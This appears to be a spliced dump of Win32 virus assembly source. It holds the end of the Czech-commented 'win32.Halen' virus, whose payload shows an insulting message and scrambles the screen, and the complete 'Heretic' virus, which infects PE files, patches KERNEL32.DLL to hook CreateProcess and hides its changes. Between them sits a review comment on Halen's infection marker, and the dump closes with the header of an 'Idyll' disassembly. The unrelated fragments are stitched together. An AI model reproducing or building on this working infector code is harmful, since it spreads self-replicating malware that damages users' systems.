lea eax,[ebp+offset user32] ;VA jmena knihovny
push eax ;
call [ebp+offset LoadLibraryAVA] ;Natahni knihovnu user32.dll
xchg eax,edx ;EDX=VA knihovny
lea esi,[ebp+offset MsgBoxAS] ;
call FindPLAPIs ;Najdem API adresy
push 1000h ;Typ okna
lea eax,[ebp+offset plTitle] ;
push eax ;Titulek okna
lea eax,[ebp+offset plText] ;
push eax ;Text okna
push 0h ;Vzdy 0h
call [ebp+offset MsgBoxAVA] ;Ukaz Dialog
push 0h ;
call [ebp+offset GetDCVA] ;Handle obrazovky
xchg eax,edx ;EDX=Handle
PLSt: xor ebx,ebx ;EBX=0h (radek)
mov ecx,0000FFh ;Cervena barva
PL00: call SetPix ;Nastav pixel
inc ebx ;Na dalsi radek
dec ecx ;Zmen barvu (od cervene k cerne)
jnz PL00 ;Cerna?
PL01: call SetPix ;Nastav pixel
inc ebx ;Dalsi radek
cmp ebx,800h ;Konec obrazovky?
jne PL01 ;Ne -> opakuj
xor ebx,ebx ;
PL02: xor eax,eax ;Sloupec 0
mov ebx,1 ;Na sloupec 1
push edx ;Uschovat handle
call MoveScr ;Posun obrazovku
pop edx ;Obnov handle
jmp PLSt ;Opakuj do zblbnuti!
NoPL: ret ;Navrat (spatny datum/cas)
FindPLAPIs:
xor eax,eax ;EAX=0 ;)
lodsb ;AL=delka nazvu API funkce
cmp al,0h ;Konec seznamu?
je FPLAOK ;yo -> hotovka
push eax ;Uschovat
push edx ;
push esi ;VA nazvu
push edx ;VA modulu (knihovny)
call [ebp+offset GetProcAddressVA] ;Zjisti VA API
pop edx ;Obnov vsechno
pop ebx ;
add esi,ebx ;Posunout za nazev
mov edi,esi ;EDI=ESI
stosd ;Ulozit VA
mov esi,edi ;ESI=EDI
jmp FindPLAPIs ;Opakuj pro dalsi nazev
FPLAOK: ret ;Hotovo!
MoveScr: push ebx ;Uschovat EBX
push 00CC0020h ;Zpusob kopirovani
push 0h ;Radek odkud
push eax ;Sloupec odkud
push edx ;Handle odkud
push 800h ;Vyska
push 800h ;Sirka
push 0h ;Handle kam
push ebx ;Radek kam
push edx ;Sloupec kam
call [ebp+offset BitBltVA] ;Posun ten kus obrazu!
pop ebx ;Obnovit
ret ;Zpet!
SetPix: push ecx ;Uschovat souradnice
push edx ;
push ecx ;Barva
push ebx ;Radek
push 0h ;Sloupec
push edx ;Handle
call [ebp+offset SetPixelVA] ;Nastav pixel
pop edx ;Obnov souradnice
pop ecx ;
ret ;Hotovo!
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű DATA Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
plTitle db 'win32.Halen',0h
plText db '..::|| Your system was fucked by win32.Halen. Written by pxR[MIONS] ||::..',0h
CryptSize db ?
CryptNr db ?
RandomNr: dd ?
DecryptStart: db 0e8h,0h,0h,0h,0h,05fh,081h,0c7h,08bh,0f7h,033h,0edh,0fch,0adh
DecryptEnd: db 0abh,45h,081h,0FDh,0fh,85h,00,00,00,00
VirSize equ offset VirusEnd-offset Start+1
DataSize equ offset VirusEnd-offset CodeEnd+1
if debug
testFName db 'test.exe',0h
endif
exeMask db '*.exe',0h
scrMask db '*.scr',0h
origIP dd ?
APITableStr:
GetFileAttributesAS db 19,'GetFileAttributesA',0h
SetFileAttributesAS db 19,'SetFileAttributesA',0h
CreateFileAS db 12,'CreateFileA',0h
GetFileTimeS db 12,'GetFileTime',0h
CreateFileMappingAS db 19,'CreateFileMappingA',0h
MapViewOfFileS db 14,'MapViewOfFile',0h
UnmapViewOfFileS db 16,'UnmapViewOfFile',0h
CloseHandleS db 12,'CloseHandle',0h
SetFilePointerS db 15,'SetFilePointer',0h
SetEndOfFileS db 13,'SetEndOfFile',0h
SetFileTimeS db 12,'SetFileTime',0h
ExitProcessS db 12,'ExitProcess',0h
FindFirstFileAS db 15,'FindFirstFileA',0h
FindNextFileAS db 14,'FindNextFileA',0h
GetWindowsDirectoryAS db 21,'GetWindowsDirectoryA',0
GetSystemDirectoryAS db 20,'GetSystemDirectoryA',0
GetCurrentDirectoryAS db 21,'GetCurrentDirectoryA',0
SetCurrentDirectoryAS db 21,'SetCurrentDirectoryA',0
GetTickCountS db 13,'GetTickCount',0
LoadLibraryAS db 13,'LoadLibraryA',0
GetSystemTimeS db 14,'GetSystemTime',0
GetProcAddressS db 15,'GetProcAddress',0
db 0h
gdi: db 'gdi32.dll',0h
user32: db 'user32.dll',0h
BitBltS db 7,'BitBlt',0h
BitBltVA dd ?
SetPixelS db 9,'SetPixel',0h
SetPixelVA dd ?
db 0h
MsgBoxAS db 12,'MessageBoxA',0h
MsgBoxAVA dd ?
GetDCS db 6,'GetDC',0h
GetDCVA dd ?
db 0h
db 0h,0h,0h,0h
CodeEnd:
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű KONEC KODU NASLEDUJICI DATA SE UZ NEKOPIRUJI S TELEM VIRU Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
CryptData db 214 dup (0h)
APITableVA:
GetFileAttributesAVA dd ?
SetFileAttributesAVA dd ?
CreateFileAVA dd ?
GetFileTimeVA dd ?
CreateFileMappingAVA dd ?
MapViewOfFileVA dd ?
UnmapViewOfFileVA dd ?
CloseHandleVA dd ?
SetFilePointerVA dd ?
SetEndOfFileVA dd ?
SetFileTimeVA dd ?
ExitProcessVA dd ?
FindFirstFileAVA dd ?
FindNextFileAVA dd ?
GetWindowsDirectoryAVA dd ?
GetSystemDirectoryAVA dd ?
GetCurrentDirectoryAVA dd ?
SetCurrentDirectoryAVA dd ?
GetTickCountVA dd ?
LoadLibraryAVA dd ?
GetSystemTimeVA dd ?
GetProcAddressVA dd ?
K32VA: dd ?
K32EAT: dd ?
K32ENPT: dd ?
K32EO: dd ?
K32EOMax: dd ?
fileAlign dd ?
infCounter db ?
mapMem dd ?
mapView dd ?
IMHandle dd ?
IFHandle dd ?
origDir db 128h dup (?)
currDir db 128h dup (?)
FileTime STRUC
LDateTime dd ?
HDateTime dd ?
FileTime ENDS
FSearchData STRUC
FAttr dd ?
CrTime FileTime ?
LAcTime FileTime ?
LWrTime FileTime ?
FSizeH dd ?
FSizeL dd ?
Res0 dd ?
Res1 dd ?
FName db 260 dup (?)
AlFName db 16 dup (?)
FSearchData ENDS
FSearch FSearchData ?
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű DIALOG BOX PRO 1. GENERACI VIRU Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
VirusEnd:
push 0h ;First generation only!
push offset FGTitle
push offset FGMessage
push 0h
call MessageBoxA
push 0h
call ExitProcess
end Start
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű A TO JE VSE PRATELE Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
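Review bot: The PE header accesses in InfectFile are bare numeric offsets with no named constants, and the one at `cmp dword ptr [esi+4ch],'NLAH'` (written again at `mov dword ptr [esi+4ch],'NLAH'`) is the only one the comments do not identify: PE+4Ch is the optional header's reserved Win32VersionValue field, which the PE specification requires to be zero, and the routine uses it as its already-infected marker. A comment such as `;PE+4Ch = OptionalHeader.Win32VersionValue (reserved, must be 0) - used as infection marker` on the first of those lines would tell a reader why the field is chosen and why a non-zero value there is a plausible static indicator for this sample; the sibling offsets (1Ch SizeOfCode, 28h AddressOfEntryPoint, 3Ch FileAlignment, 50h SizeOfImage, 74h NumberOfRvaAndSizes) deserve `equ` names for the same reason. The routine's return protocol is also undocumented: InfectFile signals that infCounter has reached zero only by leaving ESI zero (`xor esi,esi` just before UnmapView), and ICD00 relies on `test esi,esi` after the call, so the header comment at InfectFile should state that ESI is an output as well as the filename input.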
+882
@@ -0,0 +1,882 @@
;
; SYNOPSIS
;
; Heretic - A Microsoft Windows 32 virus
;
; AUTHOR
;
; Memory Lapse, [NOP]
; formerly of Phalcon/Skism
;
; ABSTRACT
;
; This virus works under all beta versions of Windows 9x, and Windows NT 4.0.
; Under a Win32s environment, the virus will fail since the kernel doesn't
; physically export any useable API. Parsing the import table of the host image
; for GetProcAddress and GetModuleHandle should do the trick.
;
; NOTES
;
; Finally after seven months (including a four month hiatus for university),
; I've finally finished this virus.
;
; Ideally when the kernel is infected, the object the virus extends
; (typically .reloc) should have its flags with IMAGE_SCN_MEM_WRITE turned off.
; This will prevent in-memory patching by antivirus software. Heretic does
; not do this. At least not yet.
;
; Useful reading material: Microsoft Platform, SDK, and DDK Documentation
;
; Greets to priest, h8, lookout, virogen and johnny panic.
;
.386
locals
.model flat, stdcall
.code
.radix 16
include heretic.inc
CRC_POLY equ 0EDB88320
CRC_INIT equ 0FFFFFFFF
crc macro string
crcReg = CRC_INIT
irpc _x,
ctrlByte = '&_x&' xor (crcReg and 0ff)
crcReg = crcReg shr 8
rept 8
ctrlByte = (ctrlByte shr 1) xor (CRC_POLY * (ctrlByte and 1))
endm
crcReg = crcReg xor ctrlByte
endm
dd crcReg
endm
MARKER equ "DOS lives somewhere in time"
org 0
start: push L offset host - start ;location of old entry point
ddOldEntryPoint = dword ptr $ - 4
pushfd ;save state
pushad
call @@delta
@@delta:pop ebp
sub ebp,offset @@delta - start
;thanks vg!
db 81,0edh ;sub ebp,unsignedlong
ddEntryPoint dd 0
add [esp+24],ebp ;return address of host
mov edi,[esp+28] ;get a "random" pointer from stack
and edi,0FFFF0000 ;mask off bottom word
call try
catch: mov esp,[esp+8] ;get pointer to our stack-based
; exception record
jmp finally ;and return to host
try: push dword ptr fs:[0] ;this is our try { } block
mov fs:[0],esp ;create stack-based exception record
.repeat
dec edi ;move back a byte
lea eax,[edi-MAGIC] ;thanks h8!
cmp [edi],eax ;match? then we've found the kernel
.until zero?
mov esi,[eax+exe_str.pe_offset]
add esi,eax ;traverse PE header and find
; Export Data Directory Table
mov ebp,[esi+pe_str.export_tbl]
add ebp,eax ;RVA -> absolute
push eax
push [ebp+edt_str.edt_ord_base]
mov ebx,[ebp+edt_str.edt_ord_rva]
mov edi,[ebp+edt_str.edt_name_rva]
mov ebp,[ebp+edt_str.edt_addr_rva]
add ebx,eax ;adjust ordinal table pointer
add edi,eax ;adjust name pointer table pointer
add ebp,eax ;adjust address pointer table pointer
push ebp ;we save these values onto the stack
push eax ; so we can free up registers
call @@delta
@@delta:pop ebp
sub ebp,offset @@delta
push ebp
; on entry:
; [esp] : delta offset
; [esp+4] : image base
; [esp+8] : address pointer table
; [esp+0c] : ordinal base
; ebx - ordinal table
; esi - pointer to our list of apis
; edi - name pointer table
lea esi,[ebp+name_ptr_api]
mov ecx,1
mov edx,(name_ptr_api_end - name_ptr_api) / 4
top: push edx
push esi
mov esi,[edi] ;calculate absolute offset of
add esi,[esp+0c] ; name pointer (image base)
mov edx,CRC_INIT
lup: lodsb
or al,al ;termination token? then quit
jz chkCRC
xor dl,al
mov al,8
.repeat ;perform CRC-32 on string
shr edx,1 ;thanks jp!
.if carry?
xor edx,CRC_POLY
.endif
dec al
.until zero?
jmp lup
chkCRC: pop esi
push edi
mov ebp,ecx
shl ebp,1 ;convert count into word index
movzx eax,word ptr [ebx+ebp] ;calculate ordinal index
sub eax,[esp+14] ;relative to ordinal base
shl eax,2 ;convert ordinal into dword index
mov ebp,eax
mov edi,[esp+10]
add eax,edi ;calculate offset
mov edi,[edi+ebp] ;RVA of API (dereference said offset)
add edi,[esp+0c] ;convert to absolute offset
mov ebp,[esp+8]
cmp edx,CRC_POLY ;CreateProcessA?
org $ - 4
crc
.if zero?
mov [ebp+lpCreateProcessA],eax ;hook it
mov [ebp+CreateProcessA],edi
.endif
cmp edx,CRC_POLY ;or CreateProcessW?
org $ - 4
crc
.if zero?
mov [ebp+lpCreateProcessW],eax ;hook it
mov [ebp+CreateProcessW],edi
.endif
cmp edx,[esi] ;or an API the virus uses?
.if zero?
mov [esi+(name_ptr_api_end - name_ptr_api)],edi
lodsd ;update pointer
dec dword ptr [esp+4] ;decrement our API count
.endif
pop edi
next: pop edx
add edi,4 ;next API
inc ecx ;remember displacement
or edx,edx ;no more names to parse?
jnz top
pop ebp ;restore delta offset
add esp,0c ;clear stack
call [ebp+GlobalAlloc], \ ;allocate memory for global structure
GMEM_FIXED, \
L size vir_str
mov edi,eax
pop [edi+vir_str.lpKernelBase]
call kernel ;attempt to infect the kernel
call [ebp+GlobalFree], \ ;release global structure resources
edi
finally:pop dword ptr fs:[0] ;this is our finally { } block
pop eax ;trash exception handler address
;low and behold, the stack is restored
popad
popfd
ret
db '[nop] 4 life.. lapse, vg and jp own you! :)'
infect: mov [edi+vir_str.ddError],TRUE ;assume an error occurred
call [ebp+GetFileAttributesA], \
[edi+vir_str.lpFileName]
mov [edi+vir_str.ddFilterAttributes],eax
inc eax
jz exit
call [ebp+SetFileAttributesA], \ ;strip file attributes
[edi+vir_str.lpFileName], \
FILE_ATTRIBUTE_NORMAL
or eax,eax ;error? possibly a r/o disk?
jz exit
call [ebp+CreateFileA], \
[edi+vir_str.lpFileName], \
GENERIC_READ or GENERIC_WRITE, \
FILE_SHARE_NOTSHARED, \
NULL, \
OPEN_EXISTING, \
FILE_ATTRIBUTE_NORMAL, \
NULL
mov [edi+vir_str.hFile],eax ;if we don't get a valid file
inc eax ;descriptor (ie. an invalid handle),
jz exitChmod ;quit processing
lea eax,[edi+vir_str.ddLastWriteTime]
lea ecx,[edi+vir_str.ddLastAccessTime]
lea edx,[edi+vir_str.ddCreationTime]
call [ebp+GetFileTime], \ ;save file timestamps
[edi+vir_str.hFile], \
edx, \
ecx, \
eax
call [ebp+CreateFileMappingA], \ ;create a mmap object
[edi+vir_str.hFile], \
NULL, \
PAGE_READONLY, \
L 0, \
L 0, \
NULL
or eax,eax
jz exitTime
mov [edi+vir_str.hFileMappingObject],eax
call [ebp+MapViewOfFile], \ ;view the file in our address space
[edi+vir_str.hFileMappingObject], \
FILE_MAP_READ, \
L 0, \
L 0, \
L 0
or eax,eax
jz exitCloseMap
mov [edi+lpBaseAddress],eax
cmp word ptr [eax],IMAGE_DOS_SIGNATURE
jnz exitUnmap ;some sort of executable?
mov esi,eax
add esi,[eax+exe_str.pe_offset] ;seek to NT header
push eax
call [ebp+IsBadCodePtr], \ ;can we read the memory at least?
esi ;potentially not a Windows file?
or eax,eax
pop eax
jnz exitUnmap
cmp dword ptr [esi],IMAGE_NT_SIGNATURE
jnz exitUnmap ;PE file?
cmp [esi+pe_str.timestamp],CRC_POLY
org $ - 4
crc MARKER
jz exitUnmap
lea eax,[ebp+infectKernel]
cmp [edi+vir_str.lpInfectMethod],eax;attempting to infect KERNEL32.DLL?
.if !zero?
test [esi+pe_str.flags],IMAGE_FILE_DLL
jnz exitUnmap ;and not a runtime library?
.endif
call getLastObjectTable
mov eax,[ebx+obj_str.obj_psize]
add eax,[ebx+obj_str.obj_poffset]
add eax,(_end - start) ;calculate maximum infected file size
mov ecx,[esi+pe_str.align_file]
call align
mov [edi+vir_str.ddFileSizeInfected],eax
call [ebp+UnmapViewOfFile], \
[edi+vir_str.lpBaseAddress]
call [ebp+CloseHandle], \
[edi+vir_str.hFileMappingObject]
call [ebp+CreateFileMappingA], \ ;reopen and extend mmap file
[edi+vir_str.hFile], \
NULL, \
PAGE_READWRITE, \
L 0, \
[edi+vir_str.ddFileSizeInfected], \
NULL
mov [edi+vir_str.hFileMappingObject],eax
call [ebp+MapViewOfFile], \
[edi+vir_str.hFileMappingObject], \
FILE_MAP_WRITE, \
L 0, \
L 0, \
L 0
mov [edi+vir_str.lpBaseAddress],eax
add eax,[eax+exe_str.pe_offset]
mov esi,eax
call getLastObjectTable
mov eax,[ebx+obj_str.obj_rva] ;set new entry point if an EXE
add eax,[ebx+obj_str.obj_psize] ; or set hooks if kernel32.dll
call [edi+vir_str.lpInfectMethod]
push edi
push esi
mov edi,[edi+vir_str.lpBaseAddress]
add edi,[ebx+obj_str.obj_poffset]
add edi,[ebx+obj_str.obj_psize]
lea esi,[ebp+start]
mov ecx,(_end - start)
cld
rep movsb ;copy virus
pop esi
pop eax
xchg eax,edi
sub eax,[edi+vir_str.lpBaseAddress] ;new psize = old psize + (_end - start)
sub eax,[ebx+obj_str.obj_poffset]
mov ecx,[esi+pe_str.align_file]
call align ;calculate new physical size
mov [ebx+obj_str.obj_psize],eax
mov eax,[ebx+obj_str.obj_vsize]
add eax,(_end - start)
mov ecx,[esi+pe_str.align_obj]
call align ;calculate potential new virtual size
cmp eax,[ebx+obj_str.obj_psize] ;if new physical size > new virtual size
.if carry?
mov eax,[ebx+obj_str.obj_psize] ;then let the virtual size = physical size
.endif
mov [ebx+obj_str.obj_vsize],eax
add eax,[ebx+obj_str.obj_rva]
cmp eax,[esi+pe_str.size_image] ;infected host increased in image size?
.if !carry?
mov [esi+pe_str.size_image],eax
.endif
mov [esi+pe_str.timestamp],CRC_POLY
org $ - 4
crc MARKER
or [ebx+obj_str.obj_flags],IMAGE_SCN_CNT_INITIALIZED_DATA or IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
lea eax,[ebp+szImageHlp]
call [ebp+LoadLibraryA], \ ;load image manipulation library
eax
or eax,eax
.if !zero?
push eax ;(*) argument for FreeLibrary()
lea ecx,[ebp+szChecksumMappedFile]
call [ebp+GetProcAddress], \ ;get address of image checksum api
eax, \
ecx
or eax,eax
.if !zero?
lea ecx,[esi+pe_str.pe_cksum]
lea edx,[edi+vir_str.ddBytes]
call eax, \ ;calculate checksum
[edi+vir_str.lpBaseAddress], \
[edi+vir_str.ddFileSizeInfected], \
edx, \
ecx
.endif
call [ebp+FreeLibrary] ;argument is set at (*)
.endif
mov [edi+vir_str.ddError],FALSE ;no errors!
exitUnmap:
call [ebp+UnmapViewOfFile], \ ;unmap the view
[edi+vir_str.lpBaseAddress]
exitCloseMap:
call [ebp+CloseHandle], \ ;remove mmap from our address space
[edi+vir_str.hFileMappingObject]
exitTime:
lea eax,[edi+vir_str.ddLastWriteTime]
lea ecx,[edi+vir_str.ddLastAccessTime]
lea edx,[edi+vir_str.ddCreationTime]
call [ebp+SetFileTime], \ ;restore file time
[edi+vir_str.hFile], \
edx, \
ecx, \
eax
call [ebp+CloseHandle], \ ;close the file
[edi+vir_str.hFile]
exitChmod:
call [ebp+SetFileAttributesA], \ ;restore file attributes
[edi+vir_str.lpFileName], \
[edi+vir_str.ddFilterAttributes]
exit: ret ;return to caller
kernel: call [ebp+GlobalAlloc], \ ;allocate memory for source buffer
GMEM_FIXED, \
_MAX_PATH
mov [edi+vir_str.lpSrcFile],eax
call [ebp+GetSystemDirectoryA], \ ;store %sysdir% in source buffer
eax, \
_MAX_PATH
call [ebp+GlobalAlloc], \ ;allocate memory for destination buffer
GMEM_FIXED, \
_MAX_PATH
mov [edi+vir_str.lpDstFile],eax
call [ebp+GetWindowsDirectoryA], \ ;store %windir% in destination buffer
eax, \
_MAX_PATH
lea eax,[ebp+szKernel]
call [ebp+lstrcatA], \ ;*lpSrcFile = %sysdir%\kernel32.dll
[edi+vir_str.lpSrcFile], \
eax
lea eax,[ebp+szKernel]
call [ebp+lstrcatA], \ ;*lpDstFile = %windir%\kernel32.dll
[edi+vir_str.lpDstFile], \
eax
call [ebp+CopyFileA], \
[edi+vir_str.lpSrcFile], \ ;%sysdir%\kernel32.dll
[edi+vir_str.lpDstFile], \ ; -> %windir%\kernel32.dll
FALSE
lea eax,[ebp+infectKernel]
mov [edi+lpInfectMethod],eax ;we're trying to infect the kernel
mov eax,[edi+vir_str.lpDstFile]
mov [edi+vir_str.lpFileName],eax
call infect
.if [edi+vir_str.ddError] == FALSE
lea eax,[ebp+szSetupApi]
call [ebp+LoadLibraryA], \
eax
or eax,eax ;if LoadLibrary fails, explicitly write
.if zero? ;to WININIT.INI (Windows 95)
lea eax,[ebp+szWinInitFile] ;delete the original kernel
push eax
push [edi+vir_str.lpSrcFile]
lea eax,[ebp+szKeyName]
push eax
lea eax,[ebp+szAppName]
push eax
call [ebp+WritePrivateProfileStringA]
lea eax,[ebp+szWinInitFile] ;move our patched kernel
push eax
push [edi+vir_str.lpDstFile]
push [edi+vir_str.lpSrcFile]
lea eax,[ebp+szAppName]
push eax
call [ebp+WritePrivateProfileStringA]
.else
push eax ;(*) argument for FreeLibrary
lea ebx,[ebp+szSetupInstallFileExA] ;fetch address of API from this DLL
call [ebp+GetProcAddress], \
eax, \
ebx
or eax,eax
.if !zero?
lea ebx,[edi+ddBytes]
call eax, \ ;move patched kernel
NULL, \ ;NT->delay until next reboot
NULL, \ ; modified MoveFileEx behaviour?
[edi+vir_str.lpDstFile], \ ;98->WININIT.INI
NULL, \
[edi+vir_str.lpSrcFile], \
SP_COPY_SOURCE_ABSOLUTE or SP_COPY_DELETESOURCE, \
NULL, \
NULL, \
ebx
.endif
mov esi,eax
call [ebp+FreeLibrary]
mov eax,esi
.endif
or eax,eax
.if zero?
mov [edi+vir_str.ddError],TRUE
.endif
.endif
.if [edi+vir_str.ddError] == TRUE
call [ebp+DeleteFileA], \ ;delete %windir%\kernel32.dll if
[edi+vir_str.lpFileName] ; an error infecting or moving
.endif
call [ebp+GlobalFree], \ ;deallocate destination buffer
[edi+vir_str.lpDstFile]
call [ebp+GlobalFree], \ ;deallocate source buffer
[edi+vir_str.lpSrcFile]
ret
infectKernel:
xchg eax,ecx
movzx eax,[esi+pe_str.size_NThdr]
add eax,esi
add eax,offset pe_str.majik
mov edx,0
lpCreateProcessA = dword ptr $ - 4
sub edx,[edi+vir_str.lpKernelBase]
@@lup: cmp [eax+obj_str.obj_rva],edx ;was the API in the previous object?
ja @@next
add eax,size obj_str ;next object
jmp @@lup
@@next: sub eax,size obj_str ;seek back to export object
push L offset hookCreateProcessA - start
call trapAPI
mov edx,0
lpCreateProcessW = dword ptr $ - 4
sub edx,[edi+vir_str.lpKernelBase]
push L offset hookCreateProcessW - start
call trapAPI
ret
infectEXE:
mov [ebp+ddEntryPoint],eax
xchg eax,[esi+pe_str.rva_entry]
mov [ebp+ddOldEntryPoint],eax
ret
trapAPI:push ebx
push ecx
mov ebx,[eax+obj_str.obj_poffset]
sub ebx,[eax+obj_str.obj_rva]
add ebx,[edi+vir_str.lpBaseAddress]
add ebx,edx
add ecx,[esp+0c]
mov [ebx],ecx
pop ecx
pop ebx
ret 4
align: xor edx,edx
add eax,ecx
dec eax
div ecx
mul ecx
ret
getLastObjectTable:
movzx eax,[esi+pe_str.num_obj]
cdq
mov ecx,L size obj_str
dec eax
mul ecx
movzx edx,[esi+pe_str.size_NThdr]
add eax,edx
add eax,esi
add eax,offset pe_str.majik ;seek to last object table
xchg eax,ebx
ret
;on entry:
; [esp] : return address to caller
; [esp+4] -> [esp+28] : registers
; [esp+2c] : return address to process
; [esp+34] : commandline
hookInfectUnicode:
call @@delta
@@delta:pop ebp
sub ebp,offset @@delta
mov edi,[esp+34]
call [ebp+WideCharToMultiByte], \ ;find out how many bytes to allocate
CP_ACP, \ ; ANSI code page
L 0, \ ; no composite/unmapped characters
edi, \ ; lpWideCharStr
L -1, \ ; calculate strlen(lpWideCharStr)+1
NULL, \ ; no buffer
L 0, \ ; tell us how many bytes to allocate
NULL, \ ; ignore unmappable characters
NULL ; don't tell us about problems
or eax,eax ;no bytes can be converted?
jz hookInfectError ;then bomb out.
push eax ;(*)
call [ebp+GlobalAlloc], \ ;allocate enough memory for the
GMEM_FIXED, \ ; converted UNICODE string
eax
or eax,eax ;any memory available?
pop ecx ;(*)
jz hookInfectError
mov esi,eax
mov edi,[esp+34]
call [ebp+WideCharToMultiByte], \ ;UNICODE -> ANSI conversion
CP_ACP, \ ; ANSI code page
L 0, \ ; no composite/unmappable characters
edi, \ ; lpWideCharStr
L -1, \ ; calculate strlen(lpWideCharStr)+1
esi, \ ; destination buffer for ANSI characters
ecx, \ ; size of destination buffer
NULL, \ ; ignore unmappable characters
NULL ; don't tell us about problems
jmp hookInfectDispatch
;on entry:
; [esp] : return address to caller
; [esp+4] -> [esp+28] : registers
; [esp+2c] : return address to process
; [esp+34] : commandline
hookInfectAnsi:
call @@delta
@@delta:pop ebp
sub ebp,offset @@delta
mov edi,[esp+34] ;get the filename
call [ebp+lstrlenA], \ ;calculate string length
edi ; (not including null terminator)
or eax,eax ;zero length?
jz hookInfectError
inc eax ;include null terminator
call [ebp+GlobalAlloc], \ ;allocate some memory for the copy
GMEM_FIXED, \
eax
or eax,eax ;no memory?
jz hookInfectError
mov esi,eax
call [ebp+lstrcpyA], \ ;*edi -> *esi
esi, \
edi
hookInfectDispatch:
push esi ;(*) argument for GlobalFree
call [ebp+GlobalAlloc], \ ;instantiate our global structure
GMEM_FIXED, \
L size vir_str
or eax,eax ;fatal error if no memory
jz hookInfectErrorFree
mov edi,eax
mov [edi+vir_str.lpFileName],esi
mov [edi+vir_str.ddError],FALSE ;assume no parsing fix-ups required
lodsb
cmp al,'"'
.if zero?
mov [edi+vir_str.lpFileName],esi
mov [edi+vir_str.ddError],TRUE ;parsing fix-ups required
.endif
hookInfectParse:
lodsb ;get a byte
.if [edi+vir_str.ddError] == TRUE ;need a fix-up?
cmp al,'"' ;'"' is our terminator
jnz hookInfectParse
.else ;no fix-up required
cmp al,' ' ;' ' or \0 is our terminator
jz hookInfectParsed
or al,al
jnz hookInfectParse
.endif
hookInfectParsed:
mov byte ptr [esi-1],NULL ;null terminate string
lea eax,[ebp+infectEXE] ;we're infecting a non-kernel32 executable
mov [edi+vir_str.lpInfectMethod],eax
call infect
call [ebp+GlobalFree], \ ;deallocate global structure
edi
hookInfectErrorFree:
call [ebp+GlobalFree] ;deallocate lpFileName
hookInfectError:
ret
hookCreateProcessW:
push CRC_POLY
CreateProcessW = dword ptr $ - 4
hookUnicode:
pushfd
pushad
call hookInfectUnicode
popad
popfd
ret
hookCreateProcessA:
push CRC_POLY
CreateProcessA = dword ptr $ - 4
hookAnsi:
pushfd
pushad
call hookInfectAnsi
popad
popfd
ret
className db '[Heretic] by Memory Lapse',0
message db 'For my thug niggaz.. uptown baby, uptown.',0
szKernel db '\KERNEL32.DLL',0
szImageHlp db 'IMAGEHLP',0
szChecksumMappedFile db 'CheckSumMappedFile',0
szSetupApi db 'SETUPAPI',0
szSetupInstallFileExA db 'SetupInstallFileExA',0
szWinInitFile db 'WININIT.INI',0
szAppName db 'Rename',0
szKeyName db 'NUL',0
name_ptr_api:
ddCloseHandle: crc
ddCopyFileA: crc
ddCreateFileA: crc
ddCreateFileMappingA: crc
ddDeleteFileA: crc
ddFreeLibrary: crc
ddGetFileAttributesA: crc
ddGetFileTime: crc
ddGetProcAddress: crc
ddGetSystemDirectoryA: crc
ddGetWindowsDirectoryA: crc
ddGlobalAlloc: crc
ddGlobalFree: crc
ddIsBadCodePtr: crc
ddLoadLibraryA: crc
ddMapViewOfFile: crc
ddSetFileAttributesA: crc
ddSetFileTime: crc
ddUnmapViewOfFile: crc
ddWideCharToMultiByte: crc
ddWritePrivateProfileStringA: crc
ddlstrcatA: crc
ddlstrcpyA: crc
ddlstrlenA: crc
name_ptr_api_end:
; absolute offsets of desired API
CloseHandle dd 0
CopyFileA dd 0
CreateFileA dd 0
CreateFileMappingA dd 0
DeleteFileA dd 0
FreeLibrary dd 0
GetFileAttributesA dd 0
GetFileTime dd 0
GetProcAddress dd 0
GetSystemDirectoryA dd 0
GetWindowsDirectoryA dd 0
GlobalAlloc dd 0
GlobalFree dd 0
IsBadCodePtr dd 0
LoadLibraryA dd 0
MapViewOfFile dd 0
SetFileAttributesA dd 0
SetFileTime dd 0
UnmapViewOfFile dd 0
WideCharToMultiByte dd 0
WritePrivateProfileStringA dd 0
lstrcatA dd 0
lstrcpyA dd 0
lstrlenA dd 0
_end:
host: call MessageBoxA, \
NULL, \
L offset lpText, \
L offset lpCaption, \
L 0 ;MB_OK
call ExitProcess, \
L 0
.data
lpCaption db 'Memory Lapse has something to say..',0
lpText db 'Hello World!',0
end start
+689
@@ -0,0 +1,689 @@
;
; Win32.Idyll.1556
; disassembly done by peon
;
;
;
; This is a noninteresting,nonresident infector of PE files.
; Infects files in the current directory.No payload or anything interesting.
; Assumed to be compiled with /m switch so NOP's after jumps included in the source.
;
; Sorry for the annoying lack of comments-most of the stuff is self-explanatory
; (so this is not the one you'll learn w32 coding from)
;
;
;compilation:
;tasm32 /m /ml idyll.asm
